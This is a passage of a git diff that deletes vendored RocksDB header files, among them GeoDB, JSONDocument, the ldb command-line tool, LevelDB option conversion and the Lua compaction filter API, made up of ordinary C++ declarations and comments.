-  }
-
-  Status LinkFile(const std::string& s, const std::string& t) override {
-    Status as = a_->LinkFile(s, t);
-    Status bs = b_->LinkFile(s, t);
-    assert(as == bs);
-    return as;
-  }
-
-  class FileLockMirror : public FileLock {
-   public:
-    FileLock* a_, *b_;
-    FileLockMirror(FileLock* a, FileLock* b) : a_(a), b_(b) {}
-  };
-
-  Status LockFile(const std::string& f, FileLock** l) override {
-    FileLock* al, *bl;
-    Status as = a_->LockFile(f, &al);
-    Status bs = b_->LockFile(f, &bl);
-    assert(as == bs);
-    if (as.ok()) *l = new FileLockMirror(al, bl);
-    return as;
-  }
-
-  Status UnlockFile(FileLock* l) override {
-    FileLockMirror* ml = static_cast<FileLockMirror*>(l);
-    Status as = a_->UnlockFile(ml->a_);
-    Status bs = b_->UnlockFile(ml->b_);
-    assert(as == bs);
-    delete ml;
-    return as;
-  }
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/geo_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/geo_db.h
deleted file mode 100644
index 408774c..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/geo_db.h
+++ /dev/null
@@ -1,114 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-#pragma once
-#include <string>
-#include <vector>
-
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-//
-// Configurable options needed for setting up a Geo database
-//
-struct GeoDBOptions {
-  // Backup info and error messages will be written to info_log
-  // if non-nullptr.
-  // Default: nullptr
-  Logger* info_log;
-
-  explicit GeoDBOptions(Logger* _info_log = nullptr):info_log(_info_log) { }
-};
-
-//
-// A position in the earth's geoid
-//
-class GeoPosition {
- public:
-  double latitude;
-  double longitude;
-
-  explicit GeoPosition(double la = 0, double lo = 0) :
-    latitude(la), longitude(lo) {
-  }
-};
-
-//
-// Description of an object on the Geoid. It is located by a GPS location,
-// and is identified by the id. The value associated with this object is
-// an opaque string 'value'. Different objects identified by unique id's
-// can have the same gps-location associated with them.
-//
-class GeoObject {
- public:
-  GeoPosition position;
-  std::string id;
-  std::string value;
-
-  GeoObject() {}
-
-  GeoObject(const GeoPosition& pos, const std::string& i,
-            const std::string& val) :
-    position(pos), id(i), value(val) {
-  }
-};
-
-class GeoIterator {
- public:
-  GeoIterator() = default;
-  virtual ~GeoIterator() {}
-  virtual void Next() = 0;
-  virtual bool Valid() const = 0;
-  virtual const GeoObject& geo_object() = 0;
-  virtual Status status() const = 0;
-};
-
-//
-// Stack your DB with GeoDB to be able to get geo-spatial support
-//
-class GeoDB : public StackableDB {
- public:
-  // GeoDBOptions have to be the same as the ones used in a previous
-  // incarnation of the DB
-  //
-  // GeoDB owns the pointer `DB* db` now. You should not delete it or
-  // use it after the invocation of GeoDB
-  // GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {}
-  GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {}
-  virtual ~GeoDB() {}
-
-  // Insert a new object into the location database. The object is
-  // uniquely identified by the id. If an object with the same id already
-  // exists in the db, then the old one is overwritten by the new
-  // object being inserted here.
-  virtual Status Insert(const GeoObject& object) = 0;
-
-  // Retrieve the value of the object located at the specified GPS
-  // location and is identified by the 'id'.
-  virtual Status GetByPosition(const GeoPosition& pos,
-                               const Slice& id, std::string* value) = 0;
-
-  // Retrieve the value of the object identified by the 'id'. This method
-  // could be potentially slower than GetByPosition
-  virtual Status GetById(const Slice& id, GeoObject*  object) = 0;
-
-  // Delete the specified object
-  virtual Status Remove(const Slice& id) = 0;
-
-  // Returns an iterator for the items within a circular radius from the
-  // specified gps location. If 'number_of_values' is specified,
-  // then the iterator is capped to that number of objects.
-  // The radius is specified in 'meters'.
-  virtual GeoIterator* SearchRadial(const GeoPosition& pos,
-                                    double radius,
-                                    int number_of_values = INT_MAX) = 0;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/info_log_finder.h b/thirdparty/rocksdb/include/rocksdb/utilities/info_log_finder.h
deleted file mode 100644
index 6df056f..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/info_log_finder.h
+++ /dev/null
@@ -1,19 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-// This function can be used to list the Information logs,
-// given the db pointer.
-Status GetInfoLogList(DB* db, std::vector<std::string>* info_log_list);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/json_document.h b/thirdparty/rocksdb/include/rocksdb/utilities/json_document.h
deleted file mode 100644
index 5d841f9..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/json_document.h
+++ /dev/null
@@ -1,195 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <deque>
-#include <map>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <utility>
-#include <vector>
-
-#include "rocksdb/slice.h"
-
-// We use JSONDocument for DocumentDB API
-// Implementation inspired by folly::dynamic, rapidjson and fbson
-
-namespace fbson {
-  class FbsonValue;
-  class ObjectVal;
-  template <typename T>
-  class FbsonWriterT;
-  class FbsonOutStream;
-  typedef FbsonWriterT<FbsonOutStream> FbsonWriter;
-}  // namespace fbson
-
-namespace rocksdb {
-
-// NOTE: none of this is thread-safe
-class JSONDocument {
- public:
-  // return nullptr on parse failure
-  static JSONDocument* ParseJSON(const char* json);
-
-  enum Type {
-    kNull,
-    kArray,
-    kBool,
-    kDouble,
-    kInt64,
-    kObject,
-    kString,
-  };
-
-  /* implicit */ JSONDocument();  // null
-  /* implicit */ JSONDocument(bool b);
-  /* implicit */ JSONDocument(double d);
-  /* implicit */ JSONDocument(int8_t i);
-  /* implicit */ JSONDocument(int16_t i);
-  /* implicit */ JSONDocument(int32_t i);
-  /* implicit */ JSONDocument(int64_t i);
-  /* implicit */ JSONDocument(const std::string& s);
-  /* implicit */ JSONDocument(const char* s);
-  // constructs JSONDocument of specific type with default value
-  explicit JSONDocument(Type _type);
-
-  JSONDocument(const JSONDocument& json_document);
-
-  JSONDocument(JSONDocument&& json_document);
-
-  Type type() const;
-
-  // REQUIRES: IsObject()
-  bool Contains(const std::string& key) const;
-  // REQUIRES: IsObject()
-  // Returns non-owner object
-  JSONDocument operator[](const std::string& key) const;
-
-  // REQUIRES: IsArray() == true || IsObject() == true
-  size_t Count() const;
-
-  // REQUIRES: IsArray()
-  // Returns non-owner object
-  JSONDocument operator[](size_t i) const;
-
-  JSONDocument& operator=(JSONDocument jsonDocument);
-
-  bool IsNull() const;
-  bool IsArray() const;
-  bool IsBool() const;
-  bool IsDouble() const;
-  bool IsInt64() const;
-  bool IsObject() const;
-  bool IsString() const;
-
-  // REQUIRES: IsBool() == true
-  bool GetBool() const;
-  // REQUIRES: IsDouble() == true
-  double GetDouble() const;
-  // REQUIRES: IsInt64() == true
-  int64_t GetInt64() const;
-  // REQUIRES: IsString() == true
-  std::string GetString() const;
-
-  bool operator==(const JSONDocument& rhs) const;
-
-  bool operator!=(const JSONDocument& rhs) const;
-
-  JSONDocument Copy() const;
-
-  bool IsOwner() const;
-
-  std::string DebugString() const;
-
- private:
-  class ItemsIteratorGenerator;
-
- public:
-  // REQUIRES: IsObject()
-  ItemsIteratorGenerator Items() const;
-
-  // appends serialized object to dst
-  void Serialize(std::string* dst) const;
-  // returns nullptr if Slice doesn't represent valid serialized JSONDocument
-  static JSONDocument* Deserialize(const Slice& src);
-
- private:
-  friend class JSONDocumentBuilder;
-
-  JSONDocument(fbson::FbsonValue* val, bool makeCopy);
-
-  void InitFromValue(const fbson::FbsonValue* val);
-
-  // iteration on objects
-  class const_item_iterator {
-   private:
-    class Impl;
-   public:
-    typedef std::pair<std::string, JSONDocument> value_type;
-    explicit const_item_iterator(Impl* impl);
-    const_item_iterator(const_item_iterator&&);
-    const_item_iterator& operator++();
-    bool operator!=(const const_item_iterator& other);
-    value_type operator*();
-    ~const_item_iterator();
-   private:
-    friend class ItemsIteratorGenerator;
-    std::unique_ptr<Impl> it_;
-  };
-
-  class ItemsIteratorGenerator {
-   public:
-    explicit ItemsIteratorGenerator(const fbson::ObjectVal& object);
-    const_item_iterator begin() const;
-
-    const_item_iterator end() const;
-
-   private:
-    const fbson::ObjectVal& object_;
-  };
-
-  std::unique_ptr<char[]> data_;
-  mutable fbson::FbsonValue* value_;
-
-  // Our serialization format's first byte specifies the encoding version. That
-  // way, we can easily change our format while providing backwards
-  // compatibility. This constant specifies the current version of the
-  // serialization format
-  static const char kSerializationFormatVersion;
-};
-
-class JSONDocumentBuilder {
- public:
-  JSONDocumentBuilder();
-
-  explicit JSONDocumentBuilder(fbson::FbsonOutStream* out);
-
-  void Reset();
-
-  bool WriteStartArray();
-
-  bool WriteEndArray();
-
-  bool WriteStartObject();
-
-  bool WriteEndObject();
-
-  bool WriteKeyValue(const std::string& key, const JSONDocument& value);
-
-  bool WriteJSONDocument(const JSONDocument& value);
-
-  JSONDocument GetJSONDocument();
-
-  ~JSONDocumentBuilder();
-
- private:
-  std::unique_ptr<fbson::FbsonWriter> writer_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd.h b/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd.h
deleted file mode 100644
index b9eb103..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd.h
+++ /dev/null
@@ -1,260 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <algorithm>
-#include <functional>
-#include <map>
-#include <sstream>
-#include <string>
-#include <vector>
-
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/ldb_tool.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "rocksdb/utilities/ldb_cmd_execute_result.h"
-
-namespace rocksdb {
-
-class LDBCommand {
- public:
-  // Command-line arguments
-  static const std::string ARG_DB;
-  static const std::string ARG_PATH;
-  static const std::string ARG_HEX;
-  static const std::string ARG_KEY_HEX;
-  static const std::string ARG_VALUE_HEX;
-  static const std::string ARG_CF_NAME;
-  static const std::string ARG_TTL;
-  static const std::string ARG_TTL_START;
-  static const std::string ARG_TTL_END;
-  static const std::string ARG_TIMESTAMP;
-  static const std::string ARG_TRY_LOAD_OPTIONS;
-  static const std::string ARG_IGNORE_UNKNOWN_OPTIONS;
-  static const std::string ARG_FROM;
-  static const std::string ARG_TO;
-  static const std::string ARG_MAX_KEYS;
-  static const std::string ARG_BLOOM_BITS;
-  static const std::string ARG_FIX_PREFIX_LEN;
-  static const std::string ARG_COMPRESSION_TYPE;
-  static const std::string ARG_COMPRESSION_MAX_DICT_BYTES;
-  static const std::string ARG_BLOCK_SIZE;
-  static const std::string ARG_AUTO_COMPACTION;
-  static const std::string ARG_DB_WRITE_BUFFER_SIZE;
-  static const std::string ARG_WRITE_BUFFER_SIZE;
-  static const std::string ARG_FILE_SIZE;
-  static const std::string ARG_CREATE_IF_MISSING;
-  static const std::string ARG_NO_VALUE;
-
-  struct ParsedParams {
-    std::string cmd;
-    std::vector<std::string> cmd_params;
-    std::map<std::string, std::string> option_map;
-    std::vector<std::string> flags;
-  };
-
-  static LDBCommand* SelectCommand(const ParsedParams& parsed_parms);
-
-  static LDBCommand* InitFromCmdLineArgs(
-      const std::vector<std::string>& args, const Options& options,
-      const LDBOptions& ldb_options,
-      const std::vector<ColumnFamilyDescriptor>* column_families,
-      const std::function<LDBCommand*(const ParsedParams&)>& selector =
-          SelectCommand);
-
-  static LDBCommand* InitFromCmdLineArgs(
-      int argc, char** argv, const Options& options,
-      const LDBOptions& ldb_options,
-      const std::vector<ColumnFamilyDescriptor>* column_families);
-
-  bool ValidateCmdLineOptions();
-
-  virtual Options PrepareOptionsForOpenDB();
-
-  virtual void SetDBOptions(Options options) { options_ = options; }
-
-  virtual void SetColumnFamilies(
-      const std::vector<ColumnFamilyDescriptor>* column_families) {
-    if (column_families != nullptr) {
-      column_families_ = *column_families;
-    } else {
-      column_families_.clear();
-    }
-  }
-
-  void SetLDBOptions(const LDBOptions& ldb_options) {
-    ldb_options_ = ldb_options;
-  }
-
-  virtual bool NoDBOpen() { return false; }
-
-  virtual ~LDBCommand() { CloseDB(); }
-
-  /* Run the command, and return the execute result. */
-  void Run();
-
-  virtual void DoCommand() = 0;
-
-  LDBCommandExecuteResult GetExecuteState() { return exec_state_; }
-
-  void ClearPreviousRunState() { exec_state_.Reset(); }
-
-  // Consider using Slice::DecodeHex directly instead if you don't need the
-  // 0x prefix
-  static std::string HexToString(const std::string& str);
-
-  // Consider using Slice::ToString(true) directly instead if
-  // you don't need the 0x prefix
-  static std::string StringToHex(const std::string& str);
-
-  static const char* DELIM;
-
- protected:
-  LDBCommandExecuteResult exec_state_;
-  std::string db_path_;
-  std::string column_family_name_;
-  DB* db_;
-  DBWithTTL* db_ttl_;
-  std::map<std::string, ColumnFamilyHandle*> cf_handles_;
-
-  /**
-   * true implies that this command can work if the db is opened in read-only
-   * mode.
-   */
-  bool is_read_only_;
-
-  /** If true, the key is input/output as hex in get/put/scan/delete etc. */
-  bool is_key_hex_;
-
-  /** If true, the value is input/output as hex in get/put/scan/delete etc. */
-  bool is_value_hex_;
-
-  /** If true, the value is treated as timestamp suffixed */
-  bool is_db_ttl_;
-
-  // If true, the kvs are output with their insert/modify timestamp in a ttl db
-  bool timestamp_;
-
-  // If true, try to construct options from DB's option files.
-  bool try_load_options_;
-
-  bool ignore_unknown_options_;
-
-  bool create_if_missing_;
-
-  /**
-   * Map of options passed on the command-line.
-   */
-  const std::map<std::string, std::string> option_map_;
-
-  /**
-   * Flags passed on the command-line.
-   */
-  const std::vector<std::string> flags_;
-
-  /** List of command-line options valid for this command */
-  const std::vector<std::string> valid_cmd_line_options_;
-
-  bool ParseKeyValue(const std::string& line, std::string* key,
-                     std::string* value, bool is_key_hex, bool is_value_hex);
-
-  LDBCommand(const std::map<std::string, std::string>& options,
-             const std::vector<std::string>& flags, bool is_read_only,
-             const std::vector<std::string>& valid_cmd_line_options);
-
-  void OpenDB();
-
-  void CloseDB();
-
-  ColumnFamilyHandle* GetCfHandle();
-
-  static std::string PrintKeyValue(const std::string& key,
-                                   const std::string& value, bool is_key_hex,
-                                   bool is_value_hex);
-
-  static std::string PrintKeyValue(const std::string& key,
-                                   const std::string& value, bool is_hex);
-
-  /**
-   * Return true if the specified flag is present in the specified flags vector
-   */
-  static bool IsFlagPresent(const std::vector<std::string>& flags,
-                            const std::string& flag) {
-    return (std::find(flags.begin(), flags.end(), flag) != flags.end());
-  }
-
-  static std::string HelpRangeCmdArgs();
-
-  /**
-   * A helper function that returns a list of command line options
-   * used by this command.  It includes the common options and the ones
-   * passed in.
-   */
-  static std::vector<std::string> BuildCmdLineOptions(
-      std::vector<std::string> options);
-
-  bool ParseIntOption(const std::map<std::string, std::string>& options,
-                      const std::string& option, int& value,
-                      LDBCommandExecuteResult& exec_state);
-
-  bool ParseStringOption(const std::map<std::string, std::string>& options,
-                         const std::string& option, std::string* value);
-
-  Options options_;
-  std::vector<ColumnFamilyDescriptor> column_families_;
-  LDBOptions ldb_options_;
-
- private:
-  /**
-   * Interpret command line options and flags to determine if the key
-   * should be input/output in hex.
-   */
-  bool IsKeyHex(const std::map<std::string, std::string>& options,
-                const std::vector<std::string>& flags);
-
-  /**
-   * Interpret command line options and flags to determine if the value
-   * should be input/output in hex.
-   */
-  bool IsValueHex(const std::map<std::string, std::string>& options,
-                  const std::vector<std::string>& flags);
-
-  /**
-   * Returns the value of the specified option as a boolean.
-   * default_val is used if the option is not found in options.
-   * Throws an exception if the value of the option is not
-   * "true" or "false" (case insensitive).
-   */
-  bool ParseBooleanOption(const std::map<std::string, std::string>& options,
-                          const std::string& option, bool default_val);
-
-  /**
-   * Converts val to a boolean.
-   * val must be either true or false (case insensitive).
-   * Otherwise an exception is thrown.
-   */
-  bool StringToBool(std::string val);
-};
-
-class LDBCommandRunner {
- public:
-  static void PrintHelp(const LDBOptions& ldb_options, const char* exec_name);
-
-  static void RunCommand(
-      int argc, char** argv, Options options, const LDBOptions& ldb_options,
-      const std::vector<ColumnFamilyDescriptor>* column_families);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd_execute_result.h b/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd_execute_result.h
deleted file mode 100644
index 5ddc6fe..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd_execute_result.h
+++ /dev/null
@@ -1,75 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifdef FAILED
-#undef FAILED
-#endif
-
-namespace rocksdb {
-
-class LDBCommandExecuteResult {
-public:
-  enum State {
-    EXEC_NOT_STARTED = 0, EXEC_SUCCEED = 1, EXEC_FAILED = 2,
-  };
-
-  LDBCommandExecuteResult() : state_(EXEC_NOT_STARTED), message_("") {}
-
-  LDBCommandExecuteResult(State state, std::string& msg) :
-    state_(state), message_(msg) {}
-
-  std::string ToString() {
-    std::string ret;
-    switch (state_) {
-    case EXEC_SUCCEED:
-      break;
-    case EXEC_FAILED:
-      ret.append("Failed: ");
-      break;
-    case EXEC_NOT_STARTED:
-      ret.append("Not started: ");
-    }
-    if (!message_.empty()) {
-      ret.append(message_);
-    }
-    return ret;
-  }
-
-  void Reset() {
-    state_ = EXEC_NOT_STARTED;
-    message_ = "";
-  }
-
-  bool IsSucceed() {
-    return state_ == EXEC_SUCCEED;
-  }
-
-  bool IsNotStarted() {
-    return state_ == EXEC_NOT_STARTED;
-  }
-
-  bool IsFailed() {
-    return state_ == EXEC_FAILED;
-  }
-
-  static LDBCommandExecuteResult Succeed(std::string msg) {
-    return LDBCommandExecuteResult(EXEC_SUCCEED, msg);
-  }
-
-  static LDBCommandExecuteResult Failed(std::string msg) {
-    return LDBCommandExecuteResult(EXEC_FAILED, msg);
-  }
-
-private:
-  State state_;
-  std::string message_;
-
-  bool operator==(const LDBCommandExecuteResult&);
-  bool operator!=(const LDBCommandExecuteResult&);
-};
-
-}
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/leveldb_options.h b/thirdparty/rocksdb/include/rocksdb/utilities/leveldb_options.h
deleted file mode 100644
index fb5a440..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/leveldb_options.h
+++ /dev/null
@@ -1,144 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <stddef.h>
-
-namespace rocksdb {
-
-class Cache;
-class Comparator;
-class Env;
-class FilterPolicy;
-class Logger;
-struct Options;
-class Snapshot;
-
-enum CompressionType : unsigned char;
-
-// Options to control the behavior of a database (passed to
-// DB::Open). A LevelDBOptions object can be initialized as though
-// it were a LevelDB Options object, and then it can be converted into
-// a RocksDB Options object.
-struct LevelDBOptions {
-  // -------------------
-  // Parameters that affect behavior
-
-  // Comparator used to define the order of keys in the table.
-  // Default: a comparator that uses lexicographic byte-wise ordering
-  //
-  // REQUIRES: The client must ensure that the comparator supplied
-  // here has the same name and orders keys *exactly* the same as the
-  // comparator provided to previous open calls on the same DB.
-  const Comparator* comparator;
-
-  // If true, the database will be created if it is missing.
-  // Default: false
-  bool create_if_missing;
-
-  // If true, an error is raised if the database already exists.
-  // Default: false
-  bool error_if_exists;
-
-  // If true, the implementation will do aggressive checking of the
-  // data it is processing and will stop early if it detects any
-  // errors.  This may have unforeseen ramifications: for example, a
-  // corruption of one DB entry may cause a large number of entries to
-  // become unreadable or for the entire DB to become unopenable.
-  // Default: false
-  bool paranoid_checks;
-
-  // Use the specified object to interact with the environment,
-  // e.g. to read/write files, schedule background work, etc.
-  // Default: Env::Default()
-  Env* env;
-
-  // Any internal progress/error information generated by the db will
-  // be written to info_log if it is non-NULL, or to a file stored
-  // in the same directory as the DB contents if info_log is NULL.
-  // Default: NULL
-  Logger* info_log;
-
-  // -------------------
-  // Parameters that affect performance
-
-  // Amount of data to build up in memory (backed by an unsorted log
-  // on disk) before converting to a sorted on-disk file.
-  //
-  // Larger values increase performance, especially during bulk loads.
-  // Up to two write buffers may be held in memory at the same time,
-  // so you may wish to adjust this parameter to control memory usage.
-  // Also, a larger write buffer will result in a longer recovery time
-  // the next time the database is opened.
-  //
-  // Default: 4MB
-  size_t write_buffer_size;
-
-  // Number of open files that can be used by the DB.  You may need to
-  // increase this if your database has a large working set (budget
-  // one open file per 2MB of working set).
-  //
-  // Default: 1000
-  int max_open_files;
-
-  // Control over blocks (user data is stored in a set of blocks, and
-  // a block is the unit of reading from disk).
-
-  // If non-NULL, use the specified cache for blocks.
-  // If NULL, leveldb will automatically create and use an 8MB internal cache.
-  // Default: NULL
-  Cache* block_cache;
-
-  // Approximate size of user data packed per block.  Note that the
-  // block size specified here corresponds to uncompressed data.  The
-  // actual size of the unit read from disk may be smaller if
-  // compression is enabled.  This parameter can be changed dynamically.
-  //
-  // Default: 4K
-  size_t block_size;
-
-  // Number of keys between restart points for delta encoding of keys.
-  // This parameter can be changed dynamically.  Most clients should
-  // leave this parameter alone.
-  //
-  // Default: 16
-  int block_restart_interval;
-
-  // Compress blocks using the specified compression algorithm.  This
-  // parameter can be changed dynamically.
-  //
-  // Default: kSnappyCompression, which gives lightweight but fast
-  // compression.
-  //
-  // Typical speeds of kSnappyCompression on an Intel(R) Core(TM)2 2.4GHz:
-  //    ~200-500MB/s compression
-  //    ~400-800MB/s decompression
-  // Note that these speeds are significantly faster than most
-  // persistent storage speeds, and therefore it is typically never
-  // worth switching to kNoCompression.  Even if the input data is
-  // incompressible, the kSnappyCompression implementation will
-  // efficiently detect that and will switch to uncompressed mode.
-  CompressionType compression;
-
-  // If non-NULL, use the specified filter policy to reduce disk reads.
-  // Many applications will benefit from passing the result of
-  // NewBloomFilterPolicy() here.
-  //
-  // Default: NULL
-  const FilterPolicy* filter_policy;
-
-  // Create a LevelDBOptions object with default values for all fields.
-  LevelDBOptions();
-};
-
-// Converts a LevelDBOptions object into a RocksDB Options object.
-Options ConvertOptions(const LevelDBOptions& leveldb_options);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h b/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h
deleted file mode 100644
index a7af592..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h
+++ /dev/null
@@ -1,189 +0,0 @@
-//  Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#if defined(LUA) && !defined(ROCKSDB_LITE)
-// lua headers
-extern "C" {
-#include <lauxlib.h>
-#include <lua.h>
-#include <lualib.h>
-}
-
-#include <mutex>
-#include <string>
-#include <vector>
-
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/lua/rocks_lua_custom_library.h"
-#include "rocksdb/utilities/lua/rocks_lua_util.h"
-
-namespace rocksdb {
-namespace lua {
-
-struct RocksLuaCompactionFilterOptions {
-  // The lua script in string that implements all necessary CompactionFilter
-  // virtual functions.  The specified lua_script must implement the following
-  // functions, which are Name and Filter, as described below.
-  //
-  // 0. The Name function simply returns a string representing the name of
-  //    the lua script.  If there's any erorr in the Name function, an
-  //    empty string will be used.
-  //    --- Example
-  //      function Name()
-  //        return "DefaultLuaCompactionFilter"
-  //      end
-  //
-  //
-  // 1. The script must contains a function called Filter, which implements
-  //    CompactionFilter::Filter() , takes three input arguments, and returns
-  //    three values as the following API:
-  //
-  //   function Filter(level, key, existing_value)
-  //     ...
-  //     return is_filtered, is_changed, new_value
-  //   end
-  //
-  //   Note that if ignore_value is set to true, then Filter should implement
-  //   the following API:
-  //
-  //   function Filter(level, key)
-  //     ...
-  //     return is_filtered
-  //   end
-  //
-  //   If there're any error in the Filter() function, then it will keep
-  //   the input key / value pair.
-  //
-  //   -- Input
-  //   The function must take three arguments (integer, string, string),
-  //   which map to "level", "key", and "existing_value" passed from
-  //   RocksDB.
-  //
-  //   -- Output
-  //   The function must return three values (boolean, boolean, string).
-  //     - is_filtered: if the first return value is true, then it indicates
-  //       the input key / value pair should be filtered.
-  //     - is_changed: if the second return value is true, then it indicates
-  //       the existing_value needs to be changed, and the resulting value
-  //       is stored in the third return value.
-  //     - new_value: if the second return value is true, then this third
-  //       return value stores the new value of the input key / value pair.
-  //
-  //   -- Examples
-  //     -- a filter that keeps all key-value pairs
-  //     function Filter(level, key, existing_value)
-  //       return false, false, ""
-  //     end
-  //
-  //     -- a filter that keeps all keys and change their values to "Rocks"
-  //     function Filter(level, key, existing_value)
-  //       return false, true, "Rocks"
-  //     end
-
-  std::string lua_script;
-
-  // If set to true, then existing_value will not be passed to the Filter
-  // function, and the Filter function only needs to return a single boolean
-  // flag indicating whether to filter out this key or not.
-  //
-  //   function Filter(level, key)
-  //     ...
-  //     return is_filtered
-  //   end
-  bool ignore_value = false;
-
-  // A boolean flag to determine whether to ignore snapshots.
-  bool ignore_snapshots = false;
-
-  // When specified a non-null pointer, the first "error_limit_per_filter"
-  // errors of each CompactionFilter that is lua related will be included
-  // in this log.
-  std::shared_ptr<Logger> error_log;
-
-  // The number of errors per CompactionFilter will be printed
-  // to error_log.
-  int error_limit_per_filter = 1;
-
-  // A string to luaL_reg array map that allows the Lua CompactionFilter
-  // to use custom C library.  The string will be used as the library
-  // name in Lua.
-  std::vector<std::shared_ptr<RocksLuaCustomLibrary>> libraries;
-
-  ///////////////////////////////////////////////////////////////////////////
-  //  NOT YET SUPPORTED
-  // The name of the Lua function in "lua_script" that implements
-  // CompactionFilter::FilterMergeOperand().  The function must take
-  // three input arguments (integer, string, string), which map to "level",
-  // "key", and "operand" passed from the RocksDB.  In addition, the
-  // function must return a single boolean value, indicating whether
-  // to filter the input key / operand.
-  //
-  // DEFAULT:  the default implementation always returns false.
-  // @see CompactionFilter::FilterMergeOperand
-};
-
-class RocksLuaCompactionFilterFactory : public CompactionFilterFactory {
- public:
-  explicit RocksLuaCompactionFilterFactory(
-      const RocksLuaCompactionFilterOptions opt);
-
-  virtual ~RocksLuaCompactionFilterFactory() {}
-
-  std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override;
-
-  // Change the Lua script so that the next compaction after this
-  // function call will use the new Lua script.
-  void SetScript(const std::string& new_script);
-
-  // Obtain the current Lua script
-  std::string GetScript();
-
-  const char* Name() const override;
-
- private:
-  RocksLuaCompactionFilterOptions opt_;
-  std::string name_;
-  // A lock to protect "opt_" to make it dynamically changeable.
-  std::mutex opt_mutex_;
-};
-
-// A wrapper class that invokes Lua script to perform CompactionFilter
-// functions.
-class RocksLuaCompactionFilter : public rocksdb::CompactionFilter {
- public:
-  explicit RocksLuaCompactionFilter(const RocksLuaCompactionFilterOptions& opt)
-      : options_(opt),
-        lua_state_wrapper_(opt.lua_script, opt.libraries),
-        error_count_(0),
-        name_("") {}
-
-  virtual bool Filter(int level, const Slice& key, const Slice& existing_value,
-                      std::string* new_value,
-                      bool* value_changed) const override;
-  // Not yet supported
-  virtual bool FilterMergeOperand(int level, const Slice& key,
-                                  const Slice& operand) const override {
-    return false;
-  }
-  virtual bool IgnoreSnapshots() const override;
-  virtual const char* Name() const override;
-
- protected:
-  void LogLuaError(const char* format, ...) const;
-
-  RocksLuaCompactionFilterOptions options_;
-  LuaStateWrapper lua_state_wrapper_;
-  mutable int error_count_;
-  mutable std::string name_;
-};
-
-}  // namespace lua
-}  // namespace rocksdb
-#endif  // defined(LUA) && !defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_custom_library.h b/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_custom_library.h
deleted file mode 100644
index 3ca8b32..0000000
